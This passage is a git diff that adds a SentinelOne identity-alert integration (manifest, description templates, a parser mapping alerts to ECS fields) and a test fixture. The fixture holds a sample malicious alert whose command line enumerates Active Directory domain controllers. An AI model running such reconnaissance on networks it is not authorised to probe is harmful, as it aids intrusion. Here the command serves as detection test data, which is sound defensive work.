z=1>W$j88*x>iI&~uR<36{sA=z43e8_#9)R>-V8|IF@?94V+eRbq=oJ^RTa!<?|(nr
z=#fiXhx_reU)C+I9QpGo&akG8E&bI(RUA!^WG!`Kn<M7Z^GT?r+G-i>jVo77Z$5-M
zN}j*WJ3><?nCV`M=|D-9*Ry=xT$3hmo}8yW1vf{^g^A}K6-*|D>>uL<cp6KoJ4hen
zTeK{Re$Ky8=h`N!=6sxNZR2x#eyYB4lTj$W%WCE~YkQs~c_3~IcIVnpML=a9q@E2a
z9J|kZUfabF=Bb4lEQhrRT)Pe0HJ}h3qY|1^K5;Ai75<%iT2!g+uYJE?;A)^nc_X#s
zP`zvEkGX+6l@~4>U6plpK?=K>>3cQnMrnB|LpIggQ>NWkdCJy5bAsk7_#eiBfYTFY
z1ild1?1J4T<&Rpuu~Zg9N($!t&)*-DY?vpK2Gd$H$TZKc!d8--vF-Yg3H1&`ZnZ>R
zx>o80iK_?a=VpnCZuZ6+p*!Al7X_sbH|`3A&@-tT2zWhz+tz~iSHjcDw7E3RFj5$r
zP!(P_lac#Yrgmu`-&>_~zE{rj9XugAnkdSNXJ*-%3@lCktTq2*tQ(T&$2RCPdL@I2
z`55lTj50pQpbM1xA=yP6efsBA2&gj=#=-mt#2#U)lRM2Y`I}eI*BbL&K(|<S&_)RD
zY`&|%cSehnEy?k{6J*PZ4?OhV!@5$`3{0L{W1yNBWN29I#=9Zmt|N%bR4scyWV6#8
zUsp$=75F)M$EQ0@wbV?<^;H%m@kh)n)9;6>-evY>sA3ok+|Rf!RIku2Wwq_a_kg)s
zo?K5zwi*rbl^D;g0iVtU?czOyGqXGgWlo=p8}LIgRtbG!Ki_E{-%8(diIm8hTM~qv
z$oHRgOg^c|vM(--HUwrk^sRbkW@3vZ4_eq8KG=yh0?m>2qb+Z>la)um5%UKh1DNle
za}WLd_o?Rx_Z8NSseS&#l>GWwbCbA2CiME>kruKBjNthx!e?x^4anH!^jhc3A0+^r
zFEI>SnAY^+eq$mATY#4$Z#kt!MZz|!*y(0aPOcvQQdsyz7u;Dpg#{w1yq(XN4V^I@
z-#Z2wg88!EZY2#>%H~S>uCzn<{``usED#u-p>~o|Erb<po!0Z~kLywB6lycMWxYi@
z{xrEwnayx)`xL}eCY&`!;9w|;`18Pe)Tv`?E_KvqY1SV;z34f>oE3d}$>{ZF++x}(
zzvuVfH!lUJjlrmCxhc86?wBV)$>ooAZC;$#tDg3{Y{xm%WV-nUc{(+t^7=eA@rUhC
zVLKX&;(io+@PD1_f!=pJw-5jJY7|IHY-N<92;X=VC_z0q_a=c~OMl_%fzOPpkcb+X
z2j4J2-yJd`O+amd_gW&aYYsA>eoe`WCZqGVHZ(L0-)$LOuZQ00Sx$QtHKX-RS7N<1
zR5tBxS7B}bWW6gO_Y;JpguZ_rXY5pP)H3FmG(c*;l`Ngy#ud)RsL2{SQ$;;VVwQz?
z7mn*!tjNyQ6-bc$Lyfp`cS}qD`4mw^+aNeUD#+rKw_&#w|8=9;kDwA_#vT@Tjpb>)
zRLmE1nfsk4MS;B18gb)sef%EL57FfvvI9S1BklDlWE?n<;4=RvA8z}FG_{P*?LY*~
z=R7bzKCXvwP5f}uI6=is)rjy>m#o~GQN5u6&u0kZ<{iJ{^Rl9+7-Ig$gF<JjL)z*X
z)Q{G3S<Gr-wd2B7%gjapPQGMxNT<E!a}EK{(ZZO;4k|DXeAOLMhN7y8!dIK_h1mca
ztoWbCfYpSVL;}#C<$2dxEpn&cjhX2QjxwJb+Js$3_r_p)^WY<LOX@^^`alyHM{7aI
z`D`_Q`BeKYpuPfV@yZc{ro?thwYpY;aV9o+l5unQ)0D=FJIU&npM{Eq9E;7RuYwWc
zx#CCnIxw${Y*XobB(vUhB-p_mH=xV#_=90T=iCxZbUfi<0ozKMPG$Nqh&(%jtQN%j
zd1ygUS~>&@4tbAvW8%*B!O6J*?B=du;hcM&I3K_Ff|w;swd_8}=b?1&JqhkjaY_aS
z^b5LqqpZl%_ep#s+KzsH=k4S($7FJSO!Srxoe(Tl>dLq?DMBK#M%#FM>l84ae2xW6
zp_m)~l(5D3Ce^=mxYQm*1XV(krt0m+_#<iOfB8NVXx|fJge}rf)g<zR=RbwX_Hoys
zE|bLyXxAlaPx7nMP3vcQm6VjI?7UIWjsAWuz7JpphI&x_ARKJns`UGJ{om|M_uy?M
z^aH+&#d$Jr0#WaM`Y+24#2de@pp$hC`xYv&iJHv~58qIJ0bdIQi~bHC2+D8PU|Q{_
z(SQB|e?GQ1^7W0kWMF|3h755GZOguA6HW`X>@%3t$#VI9cCfDz`n76gP8ppik*H+K
zZT{&e1F;ZF_OQj%royE^r%gQn(F^jhxzku}uleB^)h81=o&&abH#avU3k#nBhUrTO
ztyS2pvm#JhTbCz4VMDnze%uxJU?$njgD!n?m*T!!wo5Kext(#s>Q?|$LOc)9-~2$J
zl5x0h_K73HbY^??{QYxo_^lX@w(n#A3o*$=Q{nc|sU>|rEnYev#!e3=lJY!1$jI!d
zp!ESG4yBEh&LqC_uN0To_Uup37b#XFmgr8{JH;_VFSlct|NKHsuPAEc-jpYEv5n=Z
zm!<!<s8m99X3zv`I}y3V?mD}+c)OSVFrE4+dz!Ft_&beR%|MSAX>{Zt944C6-y?_n
zLJfAMj6jeh2xocL#OAui?^hwkSLcM&Pvzp?^hTlMVp<RMYpMtHDhK2w@`H+|_xN$9
z$DOC}m0)ufTa{7p<cVv;EU&1`AJFO0gwwW9ph{&H4tp`fMAr<n=ie~9L%6j?`c1X6
zXfN?|Tw|%IDQai8Ki?SnpD-dG{O>NS`7hCzse!qkr$cuGf`y~+XjoRjjqn#-C)99m
z8M3AqQI)TC(M*bcSxh<pNFqD(TFsFau{u8-E!|ixw-J>z+jw0W>M*`hO0s<KAYoqL
z>(=gJsw{lxUpm6r^ZHL+V2)oi1Ek==*ZtCmP7Vx%voClFzk>~;A@zp-8k&1Vm7bVp
zwtAyNyID-Z7P&RtoR6*0p@kx)?1un@1=cHPl2>q==-zK`i(~U;tGYj*EN7-((^y_|
zsbd_@yOIPm^LEkq3trq4l#(*>?k82Ysj9k8J`F+MfSI+y5HOy8>2}sOBWMA%W`7L0
z+Y|&pKNALOBKjSQ6%zqvYFX4%=D|19@{YAJzpHH+x_V$>U?v_M2O2N!M`f%{ijTGz
zL3Ot^kX?aIklgxA3Z2zZB%K;DsKPP8F|)oOMidL_y!A2~snMOan0^Elb#tAH=-UMc
z0&xG~p~uwW@aso(9K4r60sCA)k(DPbs?6%vR*ZIu?xoijY|B5wn7ntsZ$zNl_<Dk2
zdDNk>r0=V?h4HC~F`m!%3q8|bd3n=qBX`B$Jhn8o$WOF*-NU9&WkpEwzQPvY_8N*(
zG2y+S!&SrJ^#(8NVFXn=0Gc6rclk#&S(D3by(4aL5Qldn^?Hmp^&P9Z8t2{m_a^s`
z{5y_D6%V8V<<QlDqtgcR4`?bzj^tzUs@~h~_VII>{V8(m%+lX=snpyaJ}HIGD)lRs
zYCmnc`j`?*7N0>w&39cjqfYA+Jj=f;-kjbwt4F)C^$^rGwQUW}iF4t`nS!$qfbk#-
zOU}`jD2Xsl38qd{JzBPn4(9mZqS4hE+|-KPM5K(a6Gg*gty`68OvmQ6KkUdMJif6E
z#EaQ?YPp#K=IQWTBnj&N@-8TaNlT{NbFJtFDgS-F#5)rs`u_Cn?y7k1HR>;X?lWn7
zT2Zo(dt4UWUxX-?dTp4`x@z2eHnopejC8XNqn#7)*f~d=ZXbO}4|_1}lBhaB2D$2z
zl}!7YT%pw2g6}=1$<hoQuk-03?Q}J+lzHPhl?JtYr|eu|1{FJYQ~?PJ?nq)T&55I7
zX2|*E+W?TAde}t^;y3Id-&rvbdZjFh+or#2w<k=wa4Zxz=jl`Pbw$)^!mmA^cThmV
zvtKHVBC&6#qXNw}hvWR7(Z7rEnYD~)bC$YaWXRi8lJtpozUfgsjz9Y;r0$+E-5|+z
z5+W?#_i#nuWW{P3Mw3hqk7%#0ZNFkSW}bGT(C3T(y0f0YiOX<4;?oP3gaw&z5xu^A
zAQFW4A#UxnMxD>wLVXg~@~(KXIgHnII~;slp0;{UMsh~K&-`Vej(cb#qwE+PP#&bs
zb1}b#>3~R<#OJp(Y2%0$@=^X4yv`rHLg^v{UT|}8`WCOf<&5V)4_>>~a~dPBb5d08
zY9<u@XJuzMrmIK$`SWM?kf~T91W3-%@ZpjWeZyY~`>VmO^y776a)PQy!RXt<%>XWv
zdgbi>;Rg=^`$AGEOWl)BjUmR4R{BQ}qr2R1E&{19x^lnL0zE*dL9bQ9iSCtuAHc|T
z20?Y#ZHeE1b-5z|?(9_N+a|BfY^2<n6u--2gp-s$wm2#PyPgG~Lc=jw>?i6WPKo<n
z6MG>hFDVE-d{40v1SCl=>YAc?KZv#pzSgT0+TKY(#tiSCHSsFfDQhGSeCZ(!cVUPD
zmxGLr%*N>7snNu;p8Y`31bv_hdsmSdjJ!z#c01iDdi$3N6)lu5?^l$4F_RqnYb0uA
z)8eDncvVFpwFA>DIR4BjjH{D1VS57Q#`)OT5+UcrNo+`7Vm~pX#i1+vlI?;V;o4z{
zNX34A+U*oAcYzuH$6R2kAd-1%(NH(B*RzlX7%1Wse~HhKJ`y35dP2UG&!*}>X3`V<
zn^{7_LZrrmylfZc?v%6>*#-UNb`vV4=2PGZnt25KtxV8}Q?rn9Vj^(vUC9pmWjoZA
z&~9K>?i5CiLwUKj9<Pd2pU8KD+uVvL4<3#>8+wL(>$w#`v{8jlJIE>#dV4qg5f|!-
z?!bG!&&gB$YWAc9eDs8uEzI0=$|TVJ$^fy)4na4d6$%7CDm~X*w=Y%exbxyy9-WRb
zgT>2leLtbD4o@`rCaTq7P0syyx6ht7Jv*4vS&f?}MIN6h&98aA>RVu-!^hUTHCCdD
zx=DCyyd!2#i}?0M1O@9%6^6~Nr^ZezUP*sm`h4TN?pvwnG?Wp%Lr!d{k(rY-pGM}@
zk6%L0`*4LCiFP<QOyb#WoDeNST0JpzXrXLlh*)jYW|XRCblrgh?vhF&imP4cC(n4#
z-d3p1hXC)!F6X|DLw9Kx9g1y@QdDc9OrZf^rM;8W-r5lJ5XDpIQ*@g8vs?C8S=ZxE
z+Zu?{8t+;T4i3!^@hA9XLE4J2QSeKULO)ThEubFU2c7J@4cs{=eDxfg!}FcrtKt~;
zf;4omFB`tb&o=g*dnlC^rcA?ET7X$>huU#xL0;!Acl(+UT7p)^DP$NuP?LREvG6>k
ze}?s8{KPH?^$>J#xWs%BE{f1zfMD+qc+yRZ(8!)$T#{#4LDFbu<UKZ5YLxQHm-D1u
z-ht^3h_pKt!mVbK7)~&qF1qDszTvdc+=i-^2U}Knxx>h73%Z$yY8oXs&_KH@IPhIh
zdw`j#4rlAV+$Xg(e_GdWf-aVXvfe(X{QB2wi2ENLaHc<B?9HBJtT#2&Um<1mI{Vw<
zBYXGoGC5chO^M(vjyPZOIqqBAinR+{-uD#=j0%Te0_Wox;z->dUF0V&-hdI!KE5jU
z69wuV9TahcS1W1n4P0mI*ZD{QXmz2tj4yFBfTd}=2h!dmk{VOve11dsj7T;+e{qp<
zWG$A6ct)aIRsoebxaj9HpWb4P?o#KRpXO#<ev<S#xk`@~)+U>me{j)XX;4x_z#H{<
zY<&2t=erEe>v@7I-`(lOnYc=<rD;h^<<;4_H|0t52$R4@-xAsK5u&k9aYaKtSl^-v
zPa=6@>`%XxFy8Oz!AuCQLw2<$oBPaF*PTiq=6q=@y*CwJ`Osqa6D`9Bb`1XbFAxvl
z{@njYK;y;q(h3|Q5$*#1H9ygH`$4m*oDS(<DE_ZzVt1N6*(8LLWS1C@vvYCTs{u)&
z8FUSo4Zn_?m)hHPE$%j*sY>MCpt%Hm3EzM0=ZRI~$3JWWe#{G{8D>t^9mm7Udcl=A
zlbX3nKEO?lP7+>yJq&+2^Gc9$P#CYHaB=^|i!nz(<2Pr)JdBx8NkI`>i}+>FrA%lN
zYQR0yyPjz&3R+1Xd7`8gn=-P&oosr=2zpIky{8~aocA^|x~pQ}@A4*tv$I6h=o+df
zlp3ro@j29*bMDjIr;qQZ&ftFxTuEp?cQK+2YYx+xIN_&$>-qc++h$-sv>Jmo-vhTp
zXcPP0D)s{Omu;n;G|}3>!e|HQ!>z`yOSg(ayQ?g>{}NY^#JyUtH$TF9AlRkHV(`@~
zi6Ln~ppPxOgov_nYH~cdaI|OaKrEGz@;mqiwX>oTej$P8R~%CtWY_VL0!0Mz73H~J
z!+9T4)s&T#v$JU{Vbd453uHTU$dAU;e8Z_b*&%9&EE?|I{=EQrXO!m<6FKd~A3ZH9
z{b7pgjYsG@nD{vQKeMURK@%=D*8U*eATW<xW*d7$5%{~LtBxnH`lqc|xfDh=Xd;vQ
zJ*&Si<=W&EvffBZk`R?*yHnqAB2dv);>4W1?Mqn&y4_6$dcibbbA7+-C&7iYuC!P7
zx8dgAZ*1WH*1&KUh;N;Ojp@WmXvlVHM$`VwV<~qLG1Q?jXmB0hreXHkn0=b^*|{Hc
z80FjNBNsvpo$e$#_1ub>)nW7xe)97t14*68H0!qSm!rVNm}dN1$o^z@oI~l@wUM&I
zDJ(1;=3vhVNn2{zoVjcINpFt<&<MW(yp1YVE9vX))*XM~3A(u(Pm66#IRzxAWg4g>
zFEOF7fYTul#(_YV2GrE-+vc>D0?MLdz|w1ZwsNh&A^5!Ko?Z|3gC1|cb~41o40HaU
zOi5#?(_BIqk$YapBikmKrCyfZsRi)9uHKezNLUU8$RFnoT~DeeOTVqE3vHOcyY_JZ
zUbv$pNPlFsH<m(fKL|2g<D82Ic&&k|64zAV1F}IB?&~t5<7E>B5`6pEnqLWyIQ-n~
z(~hJP_QuG~04<U49qq?~;1D2TGg;$jJCX5RyUD-)QF(c*W4wY@Y}~b4|CA&8Vn(4K
z*LCahCrc$vfrw5CriszvLV?2Lq}(UeLIPU{762cstYi~M$u{P6r3n+h`EXkoGjCg0
zlGBxM!rweX+u$se6%6LN;PG8qTRSlo4B~4n<wlAA&fvYsjC2YOy_wc;y8V-8a04x$
ztEbaDU(z@J`!zeS>-It)@|Feg1uvbr|C-)m?fOt=1(30!Dgv!!Y{^dBNwC{>%vlb<
z=z^niGIP*ZSUN(UHAT7P!O~3NR2c-Y{x8{%*SW<yflfadwM)L^ZPm+}f#a_a8CE;z
z_D_oE<-1=6;|n3aU*APh3wq7U$61-MJgYnOJ3^1m)3f1Xw#9RG`gaucvMu$OJbr)$
z&j4BBn7dv3Y1gTSK2oTt#<4ese30lB=^7eZ!a<Q2IKh>nuA$-T=pzeO<W3Fz8xNS@
zRa41E;LL=cVDf`o@-T8uPXTpf*>R6ve7OIDiliS?HUlH}tC-BqPk?zCQ(&vJ9{Bf9
zMORmsQw!iRq+W^o4gUs~ru3L3B2t6JACZ1V+FN@@jT}_u5@=0P^*8XJ&kmB-p{7n&
z3mkH9{eD>oLY#5%+}E<dwr^e-y)WUlHi$>)#qu?i;xp>a+Pk5s3+1sB*i6ZGeV_jd
zIS6*<6a2JOWHS!5_tWM^8EM5}xJIRGR=;gEv+uDI&v{=<Q}afrB=}Mc9Fh!hu6uUI
zft5A(R7!qVlNmrURYPmxoVcsxD)_zCiaV<fA0`G{2~+e`+hTRC8hK;$2bK>2q_HcO
zl#T(odO$OXnl^hGGO(`^hCLC!Ve~608}+h2AOPCF9XCl?S&Eq<lsc@<@k#q39mst)
zRec}tP?r0x{F#82Ivsa8!8u{Hl!vm@@l$I$PE#PWuR&;ZB8fYt&Iyr%e}v(x;vCy9
z_%p~vTiy2D@vix3Jo;FD?x{OO7<P!q{v@IU-Gi3=f=8uos8QPrWz_`aUkI=rUv0H1
zIXBbBo4BmBh_64}1fOBUm+&nhihhjCK17-z53PvYJB?;F@IlAAW_X0(6rUPK<CYt+
zs=<1)0#=lXt(np?WMXuZrZiZfRb@c|exf__uQp#hO-6Pyrse92m0n88_2yUl2hHIB
zG<E-H06=-9vNzyMYT%Sn5UL@R)nPEJBgeM+^z+ayAkR>cr0lO94SfHuIlAs8OH$jq
zQdV%)W!@UP1{0;kqXRjF55y<3@CA{uZN@D#ebr9s)HYWug3bw{9lX80!w&6*=#haa
z$ucM~TlHBv9<MWTGQKq^Kij>FHH>Yd-?;deuQ(-tWaaT734!w`A^;QRdHmQ^M@++a
zM5Y|kRyDLAj1B{K2>XP=;*5X_OR9jUtjUCQS_J$57Qo0c4K4f7i5OE~1wi!av9UVl
zU0rTJ@jhWN6?>HC`q1y=i3UKgILuuLxK*<$1?{~p$@fb$^VB%^AAR|~TRhR15_~oZ
z)P@=}kA%A?woiKjzjaL2J5F(}hVyf!JY8TYa7?Rm{s)hnxqmRyQ8WYJZeee55}rRp
zMJeT@KrcFjt_C9J=znMX&ajinA%EbChekK+Imv395quCXWOD9OdmDUL^wW^dO~tr-
zQxIw{!Zw%K)b@U9(U}<$`hukxW{!DFkTC@56v-QE^i}fa+#BAz%Kvl7&nW69Zq?gg
z?{?{X^HULMrX)l~r;i?*1IXQySr1mxA#zs_At@yE-jG+n!xW58AF^REL9*s)qLslv
zycCESJXvq0v(#^%zZCq{6h3g$VIP#AQAuTjTe!fbE63_bM%<|dbzk6;;|Ix#&>54G
zllP-LqC5X%X?_2rU^3bZ0C()Mqy#WN33O$p68WP1VqqIv*0TL|i0E6QM6I!YD25Wa
z1oGt=NVD>0f?KZe@0Ff6kjrI1^zCP;+D=rlax!lK2F`6V(;4jI!kh8-=@P(Gm(2z2
zttlK|mt<Tc**EN!*3@S{{+D+6?nzmy73IWIFl58;xao<_qH>%^J4)n*euDAe2_*Ci
zTWyg&m%{jsotU+UV9#}p7cYRLG6Z0eP@JEKh^Q_b^|*|SU_kf?Jw5j&(#9f&l)c?=
z|LV`$+8W;*%HS!6hU)nN7UqZF{<15FHU?qxWAO)HcE}UN9(R;%hN!S=ImuHSmyPG}
z9d@7QpWc`;p;-238#V=o;^R;H#AnXi_~0tGHQwuD9ha8@EzhLs5pT;UleIV=xKj!C
zQ&<l$M2Vt>tzG}<c`l}rPUWX%4F%T}lWd1$mL>7-uci+D`bDOo?rG^jf*;39$KsW0
z{%n;T*y2aDgSlyNI>1sRfQVDL0ofd@=X60W-BMbF;FC#!Bvg&_m%91by4N!a(7RBd
zeu~<dGVk-Y=c;^zwhauAAIC(u7u99^NZ^#lPO9ls#|VV<19KwwKpvOcyrBU?e@EmF
z<?%vo`ED!}DBv(W5YK~0nV(q$#hyO~EswIT{N8rWZ<v+=?xBdOve(N;Eg&+G-~QYg
z4gf8ER%s1PJjoSCcQ@+1-}nz5bOz0J5xxODG=S;;aj&HP2g&oL_8(fPBKW`_i?5c+
zc2?Fdz;I2nZru8<`XjVWKW?{P7FJ$ft|ylOu1i>UX6C;#=Ujn`oph6w$hZjWdqp1A
zl`j>IOS+pULa#gxRSv8|9Xs>6?>U=gs6Ulud;d({D>^?-7syFRm;k7A%8zw7D3g8p
zs<=$}d=;`G+Vx{xF1`gkF1G^4`6{K&JONCry;$jF-pKQL`|WI;T)S$`4%~JgLH<{Q
ze`QyxP`@zA^r-p091?p3n3pVlgX<ux*OyV8WFPRwNxENs2ZhsQXc`B<FZpYv4!-Tb
zz%>aNiNz5+#nt|{%`mkKLCeZ&2MJX8h0c|)w9m3ahh3oy({*Qgz($4swK~wmJsxdF
zjngNUb}g4(>|9nY<>3@c+tAEp`#3M0Hxz8vAWjaGHTLX%)CiyTBk0zq#!Hu*KbLBZ
z&Mq4j+f`DIpv}#(v$N}x+%Io_G&pZEz;|v%WU0M3;#6!r6{7`2ZImsdspYS>&a&0)
zC+Oe$J*kAvfN0m5RK;?0B6r(3fp~|s2wkGIE*Q<q=1!a1{K%T0I(0K)kQ%h0QS!!v
zXaS~Q;Hk{fS*-gFd{g(<wr<^aN^zHP>_o|QK+%EEWFQ*W^Uf4qjl&F=pgV=7nGKKv
z;X495H7mb9p(=J{%O)KyJ&+C-1XXbuENWr9{C3WcUK6|(`)gy?{ca~m?cYU!-fQ^Z
z?$Pg{JsYSBS=51q(0+#|*QvEb?+Y6)@U<-C+CiOgUZ?_Kc2yopKjM~rrO5dgR?4a%
z*8JC>Jf1)6v5A`QGwKQKgqVi?HP$Jdgv&!Z9h?2UX}Y~N+OJpiUoCe<P{#xIk;l+y
zeOoa~^Y@bP$%8%T9D(8A8tp>cYJR|Ir=;C$T?WFSWTsaWNfZx2;rOU`j53yUT4*k5
zVeb&hb1pWGkQA6xL(Oi&e@RaCdU?Ui_7|vkh3@)WKI@|Y8%2sEwX?T3mWhGExVvl!
zq$~^quQVlrzSdc7b(iu_!J9MeU0i~kyPhIiUFk4HcDLmKN=H|3Zfcl`GAl%rg=hb$
z;hW({-~Q2*4Z*MvB)bxyz5;b^#qALt_wIaDy{y=I48{?MXAr)5k*`^<brf=Iy6?96
z)i|y9-jL04KJ3Z?L_wE|BGztrVZVOI0DM~kGk=g;17t$-`GqNuq%cg@KR@f8nNV>V
zTeO@S+iqJ^QAJsjQoSNw-kqKsvlGf<9KSgx<H%AEb+@#%lzE&yMxad<p_^&O9P>nP
ziZ&Giyvs%?D@ourkOn~~UF&d=@bKspgvT*}7fCHLFakBCHve&ef*bdo_wy9iY^Y`-
z`-Zdw?Xwp+dcFCw+OZi%>ro<)uS)HT;8?sqpoYpvhTY!yM2d!LD;)5%#e#iRW;6;-
zb3hA!u{Yk2q}FIpq%bD$OxU^~)84@Ym!Hx+rOcraN&*5SvgEEe#>|Y2?XkOUz@pW~
zyQZx@#hI)9y~LIw&%J?-+!lyi3Gcfwf`B4L3$`=F=2fw@`-}}`?#NfM{)mxLvfp>H
z0VGA$&8}#ZCrI2Bo&N@mi-s+Ig^7*+{2APA{jqdCu2iQ|kV=Jy&OS-Tf-rn!-75<?
zQ%1g+X!%wRgW%bK{NXv^$)RYI7-#sEH`!JqXQT}1g=RIQ6PC*>ceuVY)J@af{xO~L
z^=e(%2ZDNG68?wFm~UeE@4x`5u0c*g0VrCIY!8%&f)v5bRI}7Ee+xbcqJTKm*+JIJ
zo|6t?@R<!rH*J&M`op^^c}s>RQ8BR#IJ<I^NT(`3FqZBAU;lpx{tw=PUly0Q;yWUS
Vevj;b0DpZ3Qc=`YsFt&M|3CZ0xi|m-

literal 0
HcmV?d00001

diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml
new file mode 100644
index 000000000..449172f8a
--- /dev/null
+++ b/SentinelOne/identity/_meta/manifest.yml
@@ -0,0 +1,8 @@
+uuid: b502e522-6996-4b12-9538-f69326b68243
+name: identity
+slug: identity
+
+description: >-
+  SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats.
+
+data_sources:
diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json
new file mode 100644
index 000000000..ad570cb92
--- /dev/null
+++ b/SentinelOne/identity/_meta/smart-descriptions.json
@@ -0,0 +1,46 @@
+[
+  {
+    "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status} on {process.command_line}",
+    "conditions": [
+      {
+        "field": "sentinelone.identity.name"
+      },
+      {
+        "field": "sentinelone.identity.status"
+      },
+      {
+        "field": "process.command_line"
+      }
+    ]
+  },
+  {
+    "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status}",
+    "conditions": [
+      {
+        "field": "sentinelone.identity.name"
+      },
+      {
+        "field": "sentinelone.identity.status"
+      }
+    ]
+  },
+  {
+    "value": "Alert defined {sentinelone.identity.name} on {process.command_line}",
+    "conditions": [
+      {
+        "field": "sentinelone.identity.name"
+      },
+      {
+        "field": "process.command_line"
+      }
+    ]
+  },
+  {
+    "value": "Alert defined {sentinelone.identity.name}",
+    "conditions": [
+      {
+        "field": "sentinelone.identity.name"
+      }
+    ]
+  }
+]
\ No newline at end of file
diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml
new file mode 100644
index 000000000..507745cb7
--- /dev/null
+++ b/SentinelOne/identity/ingest/parser.yml
@@ -0,0 +1,67 @@
+name: identity
+pipeline:
+  - name: json_event
+    external:
+      name: json.parse-json
+      properties:
+        input_field: "{{original.message}}"
+
+  - name: detected_at
+    filter: "{{json_event.message.detectedAt != null}}"
+    external:
+      name: date.parse
+      properties:
+        input_field: "{{json_event.message.detectedAt}}"
+        output_field: timestamp
+
+  - name: started_at
+    filter: "{{json_event.message.firstSeenAt != null}}"
+    external:
+      name: date.parse
+      properties:
+        input_field: "{{json_event.message.firstSeenAt}}"
+        output_field: timestamp
+
+  - name: last_seen_at
+    filter: "{{json_event.message.lastSeenAt != null}}"
+    external:
+      name: date.parse
+      properties:
+        input_field: "{{json_event.message.lastSeenAt}}"
+        output_field: timestamp
+
+  - name: set_meta_fields
+stages:
+  set_meta_fields:
+    actions:
+      - set:
+          event.kind: "alert"
+          event.category: "intrusion_detection"
+          event.type: "info"
+          observer.vendor: "SentinelOne"
+          observer.product: "Singularity Identity"
+
+          "@timestamp": "{{detected_at.timestamp}}"
+          event.start: "{{started_at.timestamp}}"
+          event.end: "{{last_seen_at.timestamp}}"
+
+          event.provider: "{{json_event.message.detectionSource.product}}"
+          event.reason: "{{json_event.message.description}}"
+
+          process.command_line: "{{json_event.message.process.cmdLine}}"
+          process.parent.name: "{{json_event.message.process.parentName}}"
+
+          file.path: "{{json_event.message.process.file.path}}"
+          file.name: "{{json_event.message.process.file.path | basename}}"
+          file.hash.sha1: "{{json_event.message.process.file.sha1}}"
+          file.hash.sha256: "{{json_event.message.process.file.sha256}}"
+          file.hash.md5: "{{json_event.message.process.file.md5}}"
+
+          sentinelone.identity.id: "{{json_event.message.id}}"
+          sentinelone.identity.name: "{{json_event.message.name}}"
+          sentinelone.identity.attackSurfaces: "{{json_event.message.attackSurfaces}}"
+          sentinelone.identity.status: "{{json_event.message.status}}"
+          sentinelone.identity.classification: "{{json_event.message.classification}}"
+          sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}"
+          sentinelone.identity.result: "{{json_event.message.result}}"
+          sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}"
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json
new file mode 100644
index 000000000..1e8b5bf2b
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_1.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\n  \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n  \"name\": \"Domain Controller Discovery Detected\",\n  \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n  \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n  \"attackSurfaces\": [\n    \"IDENTITY\"\n  ],\n  \"detectionSource\": {\n    \"product\": \"Identity\"\n  },\n  \"status\": \"NEW\",\n  \"assignee\": null,\n  \"classification\": \"ENUMERATION\",\n  \"confidenceLevel\": \"MALICIOUS\",\n  \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n  \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n  \"process\": {\n    \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n    \"file\": {\n      \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n      \"sha1\": null,\n      \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n      \"md5\": null\n    },\n    \"parentName\": null\n  },\n  \"result\": null,\n  \"storylineId\": null\n}"
+  },
+  "expected": {
+    "message": "{\n  \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n  \"name\": \"Domain Controller Discovery Detected\",\n  \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n  \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n  \"attackSurfaces\": [\n    \"IDENTITY\"\n  ],\n  \"detectionSource\": {\n    \"product\": \"Identity\"\n  },\n  \"status\": \"NEW\",\n  \"assignee\": null,\n  \"classification\": \"ENUMERATION\",\n  \"confidenceLevel\": \"MALICIOUS\",\n  \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n  \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n  \"process\": {\n    \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n    \"file\": {\n      \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n      \"sha1\": null,\n      \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n      \"md5\": null\n    },\n    \"parentName\": null\n  },\n  \"result\": null,\n  \"storylineId\": null\n}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T05:35:09Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.",
+      "start": "2024-11-22T05:35:09Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T05:35:09Z",
+    "file": {
+      "hash": {
+        "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398"
+      },
+      "name": "net1.exe",
+      "path": "c:\\windows\\system32\\net1.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain"
+    },
+    "related": {
+      "hash": [
+        "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
